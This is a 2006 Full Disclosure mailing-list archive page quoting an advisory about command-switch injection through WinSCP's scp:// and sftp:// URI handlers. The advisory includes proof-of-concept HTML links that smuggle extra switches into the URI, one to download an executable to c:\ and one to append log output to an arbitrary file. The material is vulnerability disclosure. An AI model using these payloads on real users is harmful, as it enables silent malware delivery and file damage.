Full Disclosure mailing list archives
Re: WinSCP - URI Handler Command Switch Parsing
From: Juha-Matti Laurio <juha-matti.laurio () netti fi>
Date: Sun, 11 Jun 2006 16:37:01 +0300 (EEST)
Your e-mail has the following Date field: Fri, 10 Mar 2006 21:24:12 +0100 My e-mail client says 'Sent: 10.3.2006 22:24:12' because of this. Archive puts it to Jun 11th, however: http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html - Juha-MattiJelmer Kuperus <jkuperus () planet nl> kirjoitti:
WinSCP - URI Handler Command Switch Parsing About winscp : WinSCP is an open source freeware SFTP client for Windows using SSH. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer. Versions affected : It was tested on WinSCP 3.8.1 , previous versions may or may not be affected Description : During a typical installation of winscp several URI handlers are installed. (scp:// sftp://) It is possible to include additional command line switches to be passed to winscp Some of these switches may initiate a file transfer, sending a specified file to an arbitrary ftp. or they may download executables to a location on a pc where they would be executed. eg. the startup folder If you create an html page with these contents <a href="scp://user:password@host:22/%22%20/console%20/command%20%22lcd% 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a> And click on the link it would automatically download malware.exe to a c:\ (asuming the host is in the cache otherwise user interaction is required) clicking on <a href="scp://jelmer@127.0.0.1:22/%22%20%22/log=c:%5csomefile% 22"log</a> would append log output to c:\somefile possibly rendering the file unusable in the process. Note that this also works when the host is not in the cache Vendor status : Martin Prikryl was notified June 04, 2006, He will "think about a solution" _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- WinSCP - URI Handler Command Switch Parsing Jelmer Kuperus (Jun 11)
- <Possible follow-ups>
- Re: WinSCP - URI Handler Command Switch Parsing Juha-Matti Laurio (Jun 11)